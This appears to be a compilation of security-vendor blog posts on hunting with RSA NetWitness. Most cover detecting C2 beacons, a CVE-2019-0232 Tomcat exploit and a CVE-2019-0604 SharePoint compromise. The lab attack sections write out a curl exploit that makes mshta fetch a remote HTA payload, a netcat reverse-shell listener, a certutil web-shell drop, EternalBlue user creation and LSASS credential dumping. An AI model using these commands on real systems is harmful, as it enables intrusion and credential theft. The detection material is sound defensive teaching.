  2. Secondly, focus on a single protocol at a time. For our hypothesis, we could start with SSL; if we have no findings, we can move on to another protocol such as HTTP. The idea is to navigate through them one by one, separating the data into smaller, more manageable buckets without getting distracted (service = 80)
  3. Now we want to hone in on the characteristics of the protocol and pull it apart. As we are looking for C2 communication, we want to look for more mechanical-type behaviour; one meta key that helps with this is Service Analysis. The below figure shows some examples of meta values created based on HTTP


A great place to get more detail on using NetWitness for hunting can be found in the RSA NetWitness Hunting Guide: RSA NetWitness Hunting Guide PDF.


From the Investigation view, we can start with our initial query looking for outbound traffic over HTTP, and open the Service Analysis meta key. There are a fair number of meta values generated, and all of them are great places to start pivoting on, you can choose to pivot on an individual meta value, or multiple. We are going to start by pivoting on three, which are outlined below:

  • http six or less headers: Modern day browsers typically have seven or more headers. This could indicate a more mechanical type HTTP connection
  • http single response: Typical user browsing behaviour would result in multiple requests and responses in a single TCP connection. A single request and response can indicate more mechanical type behaviour
  • http post no get no referer: HTTP connections with no referer or GET requests can be indicative of machine like behaviour. Typically the user would have requested one or more pages prior to posting data to the server, and would have been referred from somewhere


After pivoting into the meta values above, we reduce the number of sessions to investigate to a more manageable volume:


Now we can start to open other meta keys and look for values of interest without being overwhelmed by the enormous amount of data. This could involve looking at meta keys such as Filename, Directory, File Type, Hostname Alias, TLD, SLD, etc. Based on the meta values below, the domain de11-rs4[.]com stands out as interesting and something we should take a look at; as an analyst, you should investigate all domains you deem of interest:


Opening the Events view for these sessions, we can see a beacon pattern of ~10 minutes; the filename is the same every time, and the payload size is consistent apart from the initial communication, which could be a download of a second-stage module to further entrench. This could also be legitimate traffic: software simply checking in for updates, sending some usage data, etc.:
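As a rough way to surface this kind of fixed-interval beaconing programmatically, the inter-arrival times of the requests can be checked for low jitter. A minimal sketch, assuming request timestamps (in seconds) have been exported from the sessions under investigation; the timestamps and threshold below are illustrative:

```python
# Sketch: flagging beacon-like traffic from request timestamps.
from statistics import mean, pstdev

def looks_like_beacon(timestamps, jitter_tolerance=0.1):
    """True if inter-arrival times are near-constant (low jitter)."""
    deltas = [b - a for a, b in zip(timestamps, timestamps[1:])]
    if len(deltas) < 2:
        return False
    avg = mean(deltas)
    # Coefficient of variation below the tolerance => mechanical cadence
    return avg > 0 and pstdev(deltas) / avg < jitter_tolerance

# Requests every ~600 seconds (10 minutes) with slight variation:
ts = [0, 600, 1201, 1799, 2400, 3002]
print(looks_like_beacon(ts))  # True
```

Real user browsing produces highly irregular inter-arrival times, so a low coefficient of variation over many requests is a useful (though not conclusive) beaconing indicator.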


Reconstructing the events, we can see the body of the POST contains what looks like Base64 encoded data, and in the response we see a 200 OK but with a 404 Not Found message and a hidden attribute which references cmd.exe and whoami:

The Base64 data in the POST is encrypted, so decoding it at this point would not reveal anything useful. We may, however, be able to obtain the key and encryption mechanism if we had the executable; keep reading to see!


Similarly, we see another session which is the same, but the hidden attribute references tasklist.exe:

The following application rule logic would detect default Throwback C2 communication:
service = 80 && analysis.service = 'http six or less headers' && analysis.service = 'http post no get no referer' && filename = 'index.php' && directory = '/' && query begins 'pd='

This definitely stands out as C2 traffic and would warrant further investigation into the endpoint. This could involve directly analysing all network traffic for this machine, or switching over to NetWitness Endpoint to analyse what it is doing, or both.


NOTE: The network traffic as seen here would be post proxy, or traffic in a network with no explicit proxy settings.


Detection Using NetWitness Endpoint

As per usual, I start by opening the compromise keys. Under Behaviours of Compromise (BOC), there are multiple meta values of interest, but let's start with outbound from unsigned appdata directory:


Opening the Events view for this meta value, we can see that an executable named dwmss.exe is making a network connection to de11-rs4[.]com:


Coming back to the Investigation view, we can run a query to see what other activity this executable is performing. To do this, we execute the following query: filename.src = 'dwmss.exe'. Here we can see the executable is running reconnaissance-type commands:


From here we decide to download the executable directly from the machine itself and perform some analysis on it. In this case, we ran strings and analysed the output and saw there were a large number of references to API calls of interest:


There is also a string that references RC4, which is an encryption algorithm. This could be of potential interest to decrypt the Base64 text we saw in the network traffic:


RC4 requires a key, so while analysing the strings we should also look for potential candidates for said key. Not far from the RC4 string is something that looks like it could be what we are after:


Navigating back to the packets and copying some of the Base64 from one of the POSTs, we can run it through the RC4 recipe in CyberChef with our proposed key; in the output, we can see the data decoded successfully and contains information about the infected endpoint:
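The CyberChef steps (Base64-decode, then RC4-decrypt with the recovered key) can also be reproduced in a few lines of Python for repeatable analysis. A minimal sketch; the key and sample plaintext below are illustrative placeholders, not the actual values recovered from the sample:

```python
import base64

def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 encrypt/decrypt (the cipher is its own inverse)."""
    S = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:                         # keystream generation + XOR
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

# Illustrative placeholders -- not the real key or beacon data.
key = b"example-key"
plaintext = b"hostname=WIN-EP1"
post_body = base64.b64encode(rc4(key, plaintext))  # shape of the POST body
print(rc4(key, base64.b64decode(post_body)))       # b'hostname=WIN-EP1'
```

Because RC4 is symmetric, the same function both encrypts and decrypts, which is why feeding the decoded POST body back through it with the right key yields the cleartext check-in data.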


Now that we have confirmed this is malware, we should go back and look at all the activity generated by this process: any files it has created, files dropped around the same time, folders it may be using, etc.



C2 frameworks are constantly being developed and improved upon, but as you can see from this C2 which is ~6 years old, their operation is fairly consistent with what we see today, and with the way NetWitness allows you to pull apart the characteristics of the protocol, they can easily be identified.

It is possible to add RSA NetWitness as a Search Engine in Chrome, which allows you to run queries directly from the address bar.



The following are the steps to follow in your browser to set this up.


  1. Start by navigating to your NetWitness instance on the device you want to query (typically the broker). Note the highlighted number in the address (this number identifies the device to query and varies from environment to environment).
  2. Right click in the navigation bar and select "Edit search engines..."




  1. Click on "Add" to add a new search engine
  2. Add the information for your NetWitness instance
    • Search Engine: This can be any name of your choice. This is the name that will show in the address bar when selected
    • Keyword: This is the keyword that will be used to trigger NetWitness as the Search Engine to use (initiated by typing "keyword" followed by the <tab> key)
    • URL: this should be based on the following structure: https://<netwitness_ip>/investigation/<number from 1st step>/navigate/query/%s
  3. Click on "Add" to add NetWitness as a Search Engine



Now, whenever you click on the address bar and type nw followed by the <tab> key (or whatever keyword you chose in the previous step), you can type your NetWitness query directly in the address bar and hit <enter> to run it in NetWitness.
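Under the hood, Chrome simply URL-encodes whatever you type and substitutes it for the %s placeholder in the search engine URL. A quick illustration in Python; the IP address and device number below are placeholders for your own environment:

```python
# Sketch of what Chrome does with the %s placeholder when a query is
# submitted via the keyword. IP and device number are placeholders.
from urllib.parse import quote

template = "https://192.168.1.10/investigation/6/navigate/query/%s"

def search_url(query: str) -> str:
    # safe="" so that '=', '&', quotes, etc. in the query get percent-encoded
    return template.replace("%s", quote(query, safe=""))

print(search_url("service = 80"))
# https://192.168.1.10/investigation/6/navigate/query/service%20%3D%2080
```

This also explains why operators like = and && work fine when typed in the address bar: they are percent-encoded before NetWitness receives them.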




We are excited to share that Dell Technologies (RSA) has been positioned as a “Leader” by Gartner in the 2020 Magic Quadrant for Security Information and Event Management research report for its RSA NetWitness® Platform – for the second year in a row!


The RSA NetWitness Platform pulls together SIEM, network detection and response, endpoint detection and response, UEBA and orchestration and automation capabilities into a single evolved SIEM. RSA’s continued investments in the platform position us as the go-to platform for security teams to rapidly detect and respond to threats across their entire environment.


The 2020 Gartner Magic Quadrant for SIEM evaluates 16 vendors on the basis of the completeness of their vision and ability to execute. The report provides an overview of each vendor’s SIEM offering, along with what Gartner sees as strengths and cautions for each vendor. The report also includes vendor selection tips, guidance on how to define requirements for SIEM deployments, and details on its rigorous inclusion, exclusion and evaluation criteria. 


Download the report and learn more about RSA NetWitness Platform.


Gartner, Magic Quadrant for Security Information and Event Management, Kelly Kavanagh, Toby Bussa, Gorka Sadowski, 18 February 2020

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner's research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.


As Leader in Magic Quadrant for Security Information and Event Management 2020

As Leader in Magic Quadrant for Security Information and Event Management 2018


GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally, and is used herein with permission. All rights reserved

The concept of multi-valued meta keys - those which can appear multiple times within single sessions - is not a new one, but has become more important and relevant in recent releases due to how other parts of the RSA NetWitness Platform handle them.


The most notable of these other parts is the Correlation Server service, previously known as the ESA service.  In order to enable complex, efficient, and accurate event correlation and alerting, it is necessary for us to tell the Correlation Server service exactly which meta keys it should expect to be multi-valued.


Every release notes PDF for each RSA NetWitness Platform version contains instructions for how to update or modify these keys to tune the platform to your organization's environment. But the question I have each time I read these instructions is this: How do I identify ALL the multi-valued keys in my RSA NetWitness Platform instance?


After all, my lab environment is a fraction of the size of any organization's production environment, and if it's an impossible task for me to manually identify all, or even most, of these keys, then it's downright laughable to expect any organization to even attempt the same.


Enter....automation and scripting to the rescue!



The script attached to this blog attempts to meet that need.  I want to stress "attempts to" here for 2 reasons:

  1. Not every metakey identified by this script necessarily should be added to the Correlation Server's multi-valued configuration. This will depend on your environment and any tuning or customizations you've made to parsers, feeds, and/or app rules.
    1. For example, this script identified 'user.dst' in my environment.
    2. However, I don't want that key to be multi-valued, so I'm not going to add it.
    3. Which leaves me with the choice of leaving it as-is, or undoing the parser, feed, and/or app rule change I made that caused it to happen.
  2. In order to be as complete in our identification of multi-valued metas as we can, we need a large enough sample size of sessions and metas to be representative of most, if not all, of an organization's data.  And that means we need sample sizes in the hundreds-of-thousands to millions range.


But therein lies the rub.  Processing data at that scale requires us to first query the RSA NetWitness Platform databases for all that data, pull it back, and then process it....without flooding the RSA NetWitness Platform with thousands or millions of queries (after all, the analysts still need to do their responding and hunting), without consuming so many resources that the script freezes or crashes the system, and while still producing an accurate result...because otherwise what's the point?


I made a number of changes to the initial version of this script in order to limit its potential impact.  The result of these changes was that the script will process batches of sessions and their metas in chunks of 10000.  In my lab environment, my testing with this batch size resulted in roughly 60 seconds between each process iteration.


The overall workflow within the script is:

  1. Query the RSA NetWitness Platform for a time range and grab all the resulting sessionids.
  2. Query the RSA NetWitness Platform for 10000 sessions and all their metas at a time.
  3. Receive the results of the query.
  4. Process all the metas to identify those that are multi-valued.
  5. Store the result of #4 for later.
  6. Repeat steps 2-5 until all sessions within the time range have been processed.
  7. Evaluate and deduplicate all the metas from #4/5 (our end result).
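The batching-and-deduplication workflow above can be sketched as follows. Note this is a simplified illustration, not the attached script itself; query_metas is a stand-in for the real NetWitness SDK calls, and the toy data at the bottom is invented:

```python
# Sketch: identify multi-valued meta keys by processing sessions in
# batches of 10000, mirroring steps 2-7 of the workflow.
from collections import defaultdict

BATCH_SIZE = 10000

def find_multivalued(session_ids, query_metas):
    multivalued = set()
    for start in range(0, len(session_ids), BATCH_SIZE):
        batch = session_ids[start:start + BATCH_SIZE]   # step 2: one batch
        for session in query_metas(batch):              # step 3: results
            seen = defaultdict(int)
            for key, _value in session:                 # step 4: count keys
                seen[key] += 1
            # step 5: keep any key seen more than once in a session
            multivalued.update(k for k, n in seen.items() if n > 1)
    return sorted(multivalued)                          # step 7: dedup result

# Toy stand-in: 'alias.host' appears twice in one session, so it is flagged.
fake = lambda ids: [[("ip.src", "10.0.0.1"), ("alias.host", "a"), ("alias.host", "b")]]
print(find_multivalued([1], fake))  # ['alias.host']
```

The real script layers rate limiting and memory management on top of this core loop, which is what keeps each batch request roughly 60 seconds apart.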


This is the best middle ground I could find among the various factors.

  • A 10000 session batch size will still result in potentially hundreds or thousands of queries to your RSA NetWitness Platform environment
    • The actual time your RSA NetWitness Platform service (Broker or Concentrator) spends responding to each of these should be no more than ~10-15 seconds each.
  • The time required for the script to process each batch of results will end up spacing out each new batch request to about 60 seconds in between.
    • I saw this time drop to as low as 30 seconds during periods of minimal overall activity and utilization on my admin server.
  • The max memory I saw the script utilize in my lab never exceeded 2500MB.
  • The max CPU I saw the script utilize in my lab was 100% of a single CPU.
  • The absolute maximum number of sessions the script will ever process in a single run is 1,677,721. This is a hardcoded limit in the RSA NetWitness SDK API, and I'm not inclined to try and work around that.


The output of the script is formatted so you can copy/paste directly from the terminal into the Correlation Server's multi-valued configuration.  Now with all that out of the way, some usage screenshots:





Any comments, questions, concerns or issues with the script, please don't hesitate to comment or reach out.

What are LotL tactics?

Living-Off-The-Land tactics are those that involve the use of legitimate tools for malicious purposes. This is an old concept, but a recent growing trend among threat actors, because these techniques are very difficult to detect considering that the tools used are whitelisted most of the time. A good list of applications that can be used for these types of tactics can be found at LOLBAS (Windows) and GTFOBins (UNIX).



The first part of this article will show how an attacker is able to spot and exploit a recent RCE (Remote Code Execution) vulnerability in Apache Tomcat. We will see how the attacker is eventually able to get a reverse shell using a legitimate Windows utility, mshta.exe. The second part will focus on the detection phase, leveraging the RSA NetWitness Platform.



The attacker has targeted an organization we will call examplecorp throughout this blog post. During the enumeration phase, thanks to resources such as Google dorks and nmap, the attacker has discovered the company runs a Tomcat server which is exposed to the Internet. Upon further research, the attacker finds a vulnerability and successfully exploits it in order to obtain a reverse shell, which will serve as the foundation for his malicious campaign against examplecorp.


To achieve what has been described in the above scenario the attacker uses different tools and services:


The scenario is simulated on a virtual local environment. Below is a list of the IP addresses used:

  •  --> attacker machine (Kali Linux)
  •    --> victim/examplecorp machine  (Windows host where Tomcat is running)
  •  --> remote server where the attacker stored the malicious payload (shell.hta)


Part 1 - Attack phase

With enumeration tools such as nmap, gobuster, etc., the attacker discovers that the Tomcat server is on version 9.0.17, is running on Windows, and serves a legacy application through a CGI Servlet at the following address:


Hello World!

In our example the application is as simple as "Hello, World!", but in reality it would be something more substantial.


Upon further research the attacker discovers a vulnerability (CVE-2019-0232) in the CGI Servlet component of Tomcat prior to version 9.0.18. A detailed description of the vulnerability can be found at the following links:


With a simple test the attacker can verify the vulnerability. Just by adding ?&dir at the end of the URL the attacker can see the output of the dir command on the affected Windows server Tomcat is running on.

root@kali:~# curl ""
Hello, World!
Volume in drive C has no label.
Volume Serial Number is 4033-77BA

Directory of C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi

19/12/2019  13:27    <DIR>          .
19/12/2019  13:27    <DIR>          ..
17/12/2019  15:00    <DIR>          %SystemDrive%
16/12/2019  21:37                67 app.bat
19/12/2019  13:19                21
               2 File(s)             88 bytes
               3 Dir(s)  39,850,405,888 bytes free


Now the attacker decides to create a malicious payload that will spawn a remote shell. To do that, he uses a tool dubbed WeirdHTA, which allows him to create an obfuscated remote shell in hta format that he can then invoke remotely using the Microsoft mshta utility. The attacker tests the file against the most common antivirus software to ensure it is properly obfuscated and not detected before initiating the attack.



The attacker launches the below command to connect to the remote server and run the malicious payload:

root@kali:~# curl -v ""
*   Trying
* Connected to ( port 8080 (#0)
> GET /cgi/app.bat?&C%3A%2FWindows%2FSystem32%2Fmshta.exe+http%3A%2F%2F192.168.16.146%3A8000%2Fshell.hta HTTP/1.1
> Host:
> User-Agent: curl/7.66.0
> Accept: */*
* Mark bundle as not supporting multiuse
< HTTP/1.1 200
< Content-Type: text/plain
< Content-Length: 15
< Date: Fri, 31 Jan 2020 10:44:16 GMT
Hello, World!
* Connection #0 to host left intact


If we break this command down we can see the following:

  1. curl -v "
      The above is the URL of the Tomcat server where the CGI Servlet app (app.bat) resides
  2. ?&C%3A%2FWindows%2FSystem32%2Fmshta.exe+
      The second part is a URL-encoded string that decodes to C:\Windows\System32\mshta.exe
  3. http%3A%2F%2F192.168.16.146%3A8000%2Fshell.hta"
    This last part is the URL-encoded address of the remote location ( where the attacker keeps the malicious payload, that is shell.hta.
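The decoding in the breakdown above can be verified with Python's standard library. Note that the + in the query string decodes to the space separating mshta.exe from its argument (the hostname below is a placeholder for the attacker's server):

```python
# Decoding the URL-encoded pieces of the exploit request to confirm
# the breakdown above.
from urllib.parse import unquote, unquote_plus

# Piece 2 of the request: the URL-encoded path to mshta.exe
print(unquote("C%3A%2FWindows%2FSystem32%2Fmshta.exe"))
# C:/Windows/System32/mshta.exe

# The '+' separates the command from its argument once decoded:
print(unquote_plus("mshta.exe+http%3A%2F%2Fhost%2Fshell.hta"))
# mshta.exe http://host/shell.hta
```

Seeing %3A, %2F, and + sequences in CGI query strings like this is exactly the kind of pattern an analyst can pivot on when reviewing web server traffic.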


The attacker, who had created a listener on his remote server, obtains the shell:

root@kali:~# nc -lvnp 7777
listening on [any] 7777 ...
connect to [] from (UNKNOWN) [] 50057
Client Connected...

PS C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi> dir

    Directory: C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi

Mode                LastWriteTime         Length Name                                                                 
----                -------------         ------ ----                                                                 
d-----       17/12/2019     15:00                %SystemDrive%                                                        
-a----       16/12/2019     21:37             67 app.bat                                                              
-a----       19/12/2019     13:19             21                                                             

PS C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi>


Part 2 - Detection phase with the RSA NetWitness Platform

While investigating with RSA NetWitness Endpoint the analyst notices the Behaviors of Compromise meta key populated with the value runs mshta with http argument, which is unusual.



Filtering by the runs mshta with http argument indicator, the analyst observes that an application running on Tomcat is launching mshta which in turn is calling an hta file residing on a remote server (



Drilling into these sessions using the event analysis panel, the analyst is able to confirm the events in more detail:

  1. app.bat ( running on machine with hostname winEP1 and IP
  2. created the process
  3. called mshta.exe
  4. mshta.exe runs with the parameter


The analyst, knowing the affected machine IP address, decides to dig deeper with the RSA NetWitness Platform using the network (i.e. packet) data.


  1. Investigating around the affected machine IP in the same time range, the analyst notices the IP address (attacker) connecting to Tomcat on port 8080 (to test whether the server is vulnerable to CVE-2019-0232) by adding the dir command to the URL. He can also see the response.

  2. Immediately after the first event, the analyst notices the same IP address connecting on the same port but this time using a more complex GET request which seems to allude to malicious behavior.

  3. Now the analyst filters by ip.dst= (the IP address found in the GET request above) and is able to see the content of the shell.hta file. Although it is encoded and not human-readable, it is extremely suspicious!

  4. Next, the analyst filters by ip.dst= and eventually sees that the attacker has obtained shell access (through PowerShell) to the Windows machine where Tomcat resides.



LotL tactics are very effective and difficult to detect due to the legitimate nature of the tools used to perform such attacks. Constant monitoring and proactive threat hunting are vital for any organization. The RSA NetWitness Platform provides analysts with the visibility needed to detect such activities, thus reducing the risk of being compromised.

In this post we will cover CVE-2019-0604; albeit a somewhat older vulnerability, it is one that is still being exploited. This post will also go a little further than just the initial exploitation of the Sharepoint server, and use EternalBlue to create a user on a remote endpoint to allow lateral movement with PAExec; again, this is an old, well-known vulnerability, but something still being used. We will then utilise Dumpert to dump the memory of LSASS and obtain credentials, and then employ atexec from Impacket to further laterally move.


The Attack

The initial foothold on the network is obtained via the Sharepoint vulnerability (CVE-2019-0604). We will use the PoC code developed by Voulnet to drop a web shell:


In the above command we are targeting the vulnerable Picker.aspx page, and using cmd to echo a Base64-encoded web shell to a file in C:\ProgramData\ - we then use certutil to Base64-decode the file into a publicly accessible directory on the Sharepoint server and name it bitreview.aspx.
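The two-stage drop described above (echo Base64 text into a staging file, then use certutil -decode to reconstruct the binary) can be illustrated conceptually in Python; the payload below is a placeholder, not the actual web shell:

```python
# Sketch of the echo-then-decode drop technique. The "web shell" here
# is an illustrative placeholder string.
import base64

web_shell = b'<%@ Page Language="C#" %><!-- placeholder web shell -->'

# What 'cmd /c echo <base64> > staging file' leaves on disk:
staged = base64.b64encode(web_shell)

# Equivalent of: certutil -decode staged.txt bitreview.aspx
recovered = base64.b64decode(staged)
print(recovered == web_shell)  # True
```

Encoding the payload lets it survive being passed through cmd echo as plain text, which is why certutil invocations with -decode on freshly written files are a classic indicator worth hunting for.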


To access the web shell we just dropped onto the Sharepoint server, we are going to use the administrative tool AntSword. Here we add the URL of the web shell we dropped, and supply the associated password:


Now we can open a terminal and begin to execute commands on the server to get the lay of the land and find other endpoints to laterally move to:


The AntSword tool has a nice explorer view which allows us to easily upload additional tools to the server. In this instance we upload a scanner to check if an endpoint is vulnerable to EternalBlue:


Now we can iterate through some of the endpoints we uncovered earlier to see if any of them are vulnerable to EternalBlue:


Now that we have uncovered a vulnerable endpoint, we can use this to create a user that will allow us to laterally move to it. Using the PoC code created by Worawit, we can exploit the endpoint and execute custom shellcode of our choosing. For this I compiled some shellcode to create a local administrative user called helpdesk. I uploaded my shellcode and EternalBlue exploit executable and ran it against the vulnerable machine:


Now that we have created a local administrative user on the endpoint, we can laterally move to it using those credentials. In this instance, we upload PAExec and Dumpert, so we can laterally move to the endpoint and dump the memory of LSASS. The following command copies and executes Outflank-Dumpert.exe using PAExec and the helpdesk user we created via EternalBlue:


This tool will locally dump the memory of LSASS to C:\Windows\Temp - so we will mount one of the administrative shares on the endpoint and confirm whether our dump was successful:


Using AntSword's explorer, we can easily navigate to the file and download it locally:


We can then use Mimikatz on the attacker's local machine to dump the credentials, which may help us laterally move to other endpoints:


We decide to upload the atexec tool from Impacket to execute commands on the remote endpoint to see if there are other machines we can laterally move to. Using some reconnaissance commands, we find an RDP session using the username we pulled from the LSASS dump:


From here, we could continue to laterally move, dump credentials, and further own the network.


Detection using NetWitness Network

NetWitness doesn't always have to be used for threat hunting; it can also be used to search for things you know about, or have recently been researching. Taking the Sharepoint RCE as an example, we can easily search using NetWitness to see if any exploits have taken place. Given that this is a well documented CVE, we can start our search by looking for requests to picker.aspx (filename = 'picker.aspx'), which is the vulnerable page - from the below we can see two GET requests, and a POST for Picker.aspx (inbound requests directly to this page are uncommon):

Next we can reconstruct the events to see if there is any useful information we can ascertain. Looking into the HTTP POST, we can see the URI matches what we would expect for this vulnerability. We also see that the POST parameter, ctl00$PlaceHolderDialogBodySection$ctl05$hiddenSpanData, contains the hex encoded and serialized .NET XML payload. The payload parameter also starts with two underscores, which ensures the payload reaches the XML deserialization function, as is documented:


Seeing this would already warrant investigation on the Sharepoint server, but let's use some Python to take the hex encoded payload and deserialize it to see what was executed:
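A minimal sketch of that decode step is below. The payload value and helper name are hypothetical (the real parameter is a much larger serialized .NET XML blob), but the approach - strip the leading underscores and hex-decode the rest - matches what is described above:

```python
def decode_picker_payload(hex_blob: str) -> str:
    """Hex-decode the serialized .NET XML payload taken from the
    hiddenSpanData POST parameter of a CVE-2019-0604 request."""
    # The PoC prefixes the value with two underscores so it reaches the
    # XML deserialization function; strip them before hex-decoding.
    return bytes.fromhex(hex_blob.lstrip("_")).decode("utf-8", errors="replace")

# Hypothetical sample: the hex encoding of a short command string.
print(decode_picker_payload("__636d64202f632077686f616d69"))  # cmd /c whoami
```

In the real capture, the decoded bytes are the serialized XML itself, with the attacker's command embedded in clear text inside it.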


From this, we have the exact command that was run on the Sharepoint server that dropped a web shell. This also means we now know the name of the web shell and where it is located, making the next steps of investigation easier:

As analysts, it sometimes pays to do these things to find additional breadcrumbs to pull on - but be careful, as this can be time consuming, and other methods, such as the MFT analysis described later in this blog post, can make it a lot easier.


This means we could search for this filename in NetWitness to see if we have any hits (filename = 'bitreview.aspx'):


As you can see from the above highlighted indicators, even without knowing the name of the web shell we would still have uncovered it, as NetWitness created numerous meta values surrounding its usage. A fairly recent addition to the Lua parsers available on RSA Live is fingerprint_minidump.lua - this parser creates the meta value minidump under the Filetype meta key, and the meta value lsass minidump under the Indicators of Compromise meta key. This parser is a fantastic addition, as it tags LSASS memory dumps traversing the network, which is uncommon behaviour.


Reconstructing the events, we can see the web shell traffic which looks strikingly similar to China Chopper. The User-Agent is also a great indicator for this traffic, which is the name of the tool used to connect to the web shell:


We can Base64 decode the commands from the HTTP POSTs and get an insight into what was being executed. The below shows the initial POST, which returns the current path, operating system, and username:


The following shows a directory listing of C:\ProgramData\ being executed, which is where the initial Base64 encoded bitreview.aspx web shell was dropped:


We should continue to Base64 decode all of these commands to gain a better understanding of what the attacker did, but for this blog post I will focus on the important pieces of the traffic. Pivoting into the Events view for the meta value, hex encoded executable, we can see the magic bytes for an executable that have been hex encoded:


Extracting all the hex starting from 4D5A (MZ header in hexadecimal) and decoding it with CyberChef, we can clearly see this is an executable. From here, we could save this file and perform further analysis on it:
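The same carve can be scripted in Python (a sketch; the blog itself used CyberChef, and the function name is our own). It assumes the hex run is contiguous from the MZ header onward:

```python
def carve_hex_executable(hex_stream: str) -> bytes:
    """Carve an executable out of a hex-encoded blob by locating the
    'MZ' (4D5A) header and decoding from there."""
    lowered = hex_stream.lower()
    start = lowered.find("4d5a")  # 'MZ' in hexadecimal
    if start == -1:
        raise ValueError("no MZ header found")
    tail = lowered[start:]
    # drop a trailing half-byte if the remaining run has odd length
    tail = tail[: len(tail) - (len(tail) % 2)]
    return bytes.fromhex(tail)

# toy example: two junk bytes followed by the start of a PE header
print(carve_hex_executable("30304d5a9000"))  # b'MZ\x90\x00'
```

The decoded bytes could then be written to disk for further static analysis.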


Continuing to Base64 decode the commands, we come across something interesting: the usage of a tool called eternalblue_exploit7.exe against an endpoint in the same network. This gives the defender additional information surrounding other endpoints of interest to the attacker, and which endpoints to focus on:

If you only have packet visibility, you should always decode every command. This will help you as a defender better understand the attacker's actions and uncover additional breadcrumbs. But if you have NetWitness Endpoint, it may be easier to see the commands there, as we will see later.
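Decoding each command is a one-liner once extracted from the POST body. A minimal sketch (the function name is ours; real AntSword traffic may wrap the value in additional parameters):

```python
import base64

def decode_webshell_post(value: str) -> str:
    """Decode one Base64-encoded command parameter from the web shell traffic."""
    return base64.b64decode(value).decode("utf-8", errors="replace")

# round trip with a command similar to those seen in the POSTs
encoded = base64.b64encode(b'cd /d "C:\\ProgramData\\"&dir').decode()
print(decode_webshell_post(encoded))
```

Running every captured parameter through a loop like this quickly rebuilds the attacker's full command history.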


Knowing EternalBlue uses SMB, we can pivot on all SMB traffic from the Sharepoint server to the targeted endpoint. Opening the Enablers of Compromise meta key, we can see two meta values indicating the use of SMBv1; this is required for EternalBlue to work. There is also a meta value of not implemented under the Error meta key; this is fairly uncommon and can help detect potential EternalBlue exploitation:


Reconstructing the events for the SMBv1 traffic, we come across a session that contains a large sequence of NULLs; this is the beginning of the EternalBlue exploit, and these NULLs essentially move the SMB server state to a point where the vulnerability exists:
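As a rough illustration (our own heuristic, not a shipped NetWitness rule), a script triaging extracted SMB payloads could flag this grooming pattern by looking for long contiguous NULL runs; the 4096-byte threshold is an assumption:

```python
def null_groom_suspect(payload: bytes, threshold: int = 4096) -> bool:
    """Flag a payload containing a long contiguous run of NULL bytes,
    as seen during EternalBlue buffer grooming (heuristic)."""
    return b"\x00" * threshold in payload

# a short benign-looking packet versus a groomed one
print(null_groom_suspect(b"\xffSMB" + b"A" * 100))      # False
print(null_groom_suspect(b"\xffSMB" + b"\x00" * 5000))  # True
```

On its own this would be noisy; combined with the SMBv1 and "not implemented" indicators above, it narrows the sessions worth reconstructing.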


With most intrusions, there is typically some form of lateral movement that takes place using SMB. As a defender we should iterate through all possible lateral movement techniques, but for this example I want to see if PAExec has been used. To do this I use the following query (service = 139 && filename = 'svcctl' && filename contains 'paexe'). From the below, we can see that there is indeed some PAExec activity. By default, PAExec also includes the hostname of where the activity originated, so from the below filenames we can tell that this activity came from SP2016, the Sharepoint server. We can also see that a file was transferred, as indicated by the paexec_move0.dat meta value - this is the Outflank-Dumpert.exe tool:


Back in the Investigation view, under the Indicators of Compromise meta key, we see a meta value of lsass minidump. Pivoting on this value, we see the dumpert.dmp file in the temp\ directory for the endpoint that was accessed over the ADMIN$ share - this is our LSASS minidump created using the Outflank-Dumpert.exe tool:


Navigating back to view all the SMB traffic, and focusing on named pipes (service = 139 && analysis.service = 'named pipe'), we can see a named pipe being used called atsvc. This named pipe gives access to the AT-Scheduler Service on an endpoint and can be used to schedule tasks remotely. We can also see some .tmp files being created in the temp\ directory on this endpoint with what look like randomly generated names, and windows cli admin commands associated with one of them:


Reconstructing the events for this traffic, we can see the scheduled tasks being created. In the below screenshot, we can see the XML and the associated parameters passed - in this instance using CMD to run netstat to look for RDP connections and output the results to %windir%\Temp\rWLePJvp.tmp:


This is lateral movement behaviour via Impacket's atexec tool. It writes the output of the command to a file so it can read it and display it back to the attacker - further analysing the payload, we can see the output that was read from the file and gain insight into what the attacker was after, and subsequently which endpoints to investigate:



Detection using NetWitness Endpoint

As always with NetWitness Endpoint, I like to start my hunting by opening the three compromise meta keys (IOC, BOC, and EOC). In this case, I only had meta values under the Behaviours of Compromise meta key. I have highlighted a few I deem more interesting with regards to this blog, but you should really investigate all of them:


Let's start with the runs certutil with decode arguments meta value. Opening this in the Events view, we can see the parameter that was executed - a Base64 encoded value being echoed to the C:\ProgramData\ directory, and then certutil being used to decode it and push it to a directory on the server:


From here, we could download the MFT of the endpoint:


Locate the file that was decoded, download it locally, and see what the contents are:


From the contents of the file, we can see that this is a web shell:


We also observed the attacker initially drop a file in the C:\ProgramData\ directory, so this is also a directory of interest and somewhere we should browse to within the MFT - here we uncover the attacker's tools, which we could download and analyse:


Navigating back to the Investigate view and opening the meta value http daemon runs command prompt in the Events view, we can see the HTTP daemon, w3wp.exe, executing reconnaissance commands on the Sharepoint server:

This is a classic indicator of a web shell, whereby an HTTP daemon spawns CMD to execute commands.


Further analysis of the commands executed by the attacker shows EternalBlue executables being run against an endpoint. After this, the attacker uses PAExec with a user called helpdesk to connect to the endpoint, implying that the EternalBlue exploit created a user called helpdesk that allowed them to laterally move (NOTE: we will see how the user creation via this exploit looks a little later on):


